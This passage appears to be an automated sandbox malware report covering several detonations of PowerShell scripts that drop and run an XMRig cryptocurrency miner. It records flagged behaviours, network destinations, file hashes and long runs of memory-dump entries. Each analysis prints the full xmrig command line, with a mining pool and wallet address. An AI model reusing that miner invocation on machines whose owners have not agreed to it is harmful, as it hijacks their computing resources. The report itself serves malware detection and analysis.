memory/3028-73-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-74-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-75-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-76-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-77-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-78-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-79-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-80-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-81-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-82-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-83-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-84-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-85-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-86-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-87-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-88-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-89-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-90-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-91-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-92-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-93-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-94-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-95-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-96-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-97-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-98-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-99-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-100-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-101-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-102-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-103-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-104-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-105-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-106-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-107-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-108-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-109-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-110-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-111-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-112-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-113-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-114-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-115-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-116-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-117-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

memory/3028-118-0x00007FF68C710000-0x00007FF68D343000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/220-4-0x00007FF8B9813000-0x00007FF8B9814000-memory.dmp

memory/220-5-0x00000226FE5A0000-0x00000226FE5C2000-memory.dmp

memory/220-8-0x00007FF8B9810000-0x00007FF8BA1FC000-memory.dmp

memory/220-9-0x00000226FED00000-0x00000226FED76000-memory.dmp

memory/220-10-0x00007FF8B9810000-0x00007FF8BA1FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_odof5pbr.e0w.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/220-25-0x00007FF8B9810000-0x00007FF8BA1FC000-memory.dmp

memory/220-48-0x00000226FECC0000-0x00000226FECD2000-memory.dmp

memory/220-61-0x00000226FE5F0000-0x00000226FE5FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1332-90-0x00000240CB450000-0x00000240CB470000-memory.dmp

memory/1332-91-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-92-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/220-93-0x00007FF8B9813000-0x00007FF8B9814000-memory.dmp

memory/220-94-0x00007FF8B9810000-0x00007FF8BA1FC000-memory.dmp

memory/1332-95-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-96-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-97-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-98-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-99-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-100-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-101-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-102-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-103-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-104-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-105-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-106-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-107-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-108-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-109-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-110-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-111-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-112-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-113-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-114-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-115-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-116-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-117-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-118-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-119-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-120-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-121-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-122-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-123-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-124-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-125-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-126-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-127-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-128-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-129-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-130-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-131-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-132-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-133-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-134-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-135-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-136-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-137-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-138-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-139-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-140-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-141-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-142-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-143-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-144-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-145-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-146-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-147-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-148-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-149-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-150-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-151-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-152-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-153-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-154-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

memory/1332-155-0x00007FF711CD0000-0x00007FF712903000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp

Files

memory/4552-0-0x00007FFE778F3000-0x00007FFE778F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xchbhhl.k4j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4552-1-0x0000021A7E880000-0x0000021A7E8A2000-memory.dmp

memory/4552-11-0x00007FFE778F0000-0x00007FFE783B1000-memory.dmp

memory/4552-12-0x00007FFE778F0000-0x00007FFE783B1000-memory.dmp

memory/4552-14-0x00007FFE778F0000-0x00007FFE783B1000-memory.dmp

memory/4552-16-0x0000021A7EAF0000-0x0000021A7EAFA000-memory.dmp

memory/4552-15-0x0000021A7ED70000-0x0000021A7ED82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1204-47-0x000001C6B8690000-0x000001C6B86B0000-memory.dmp

memory/1204-48-0x000001C6B86D0000-0x000001C6B86F0000-memory.dmp

memory/1204-49-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-53-0x000001C6B8710000-0x000001C6B8730000-memory.dmp

memory/1204-52-0x000001C6B86F0000-0x000001C6B8710000-memory.dmp

memory/1204-50-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/4552-51-0x00007FFE778F3000-0x00007FFE778F5000-memory.dmp

memory/4552-54-0x00007FFE778F0000-0x00007FFE783B1000-memory.dmp

memory/1204-55-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/4552-56-0x00007FFE778F0000-0x00007FFE783B1000-memory.dmp

memory/1204-57-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-59-0x000001C6B8710000-0x000001C6B8730000-memory.dmp

memory/1204-58-0x000001C6B86F0000-0x000001C6B8710000-memory.dmp

memory/1204-60-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-61-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-62-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-63-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-64-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-65-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-66-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-67-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-68-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-69-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-70-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-71-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-72-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-73-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-74-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-75-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-76-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-77-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-78-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-79-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-80-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-81-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-82-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-83-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-84-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-85-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-86-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-87-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-88-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-89-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-90-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-91-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-92-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-93-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-94-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-95-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-96-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-97-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-98-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-99-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-100-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-101-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-102-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-103-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-104-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-105-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-106-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-107-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-108-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-109-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-110-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-111-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-112-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-113-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-114-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-115-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-116-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-117-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

memory/1204-118-0x00007FF7969B0000-0x00007FF7975E3000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:55

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

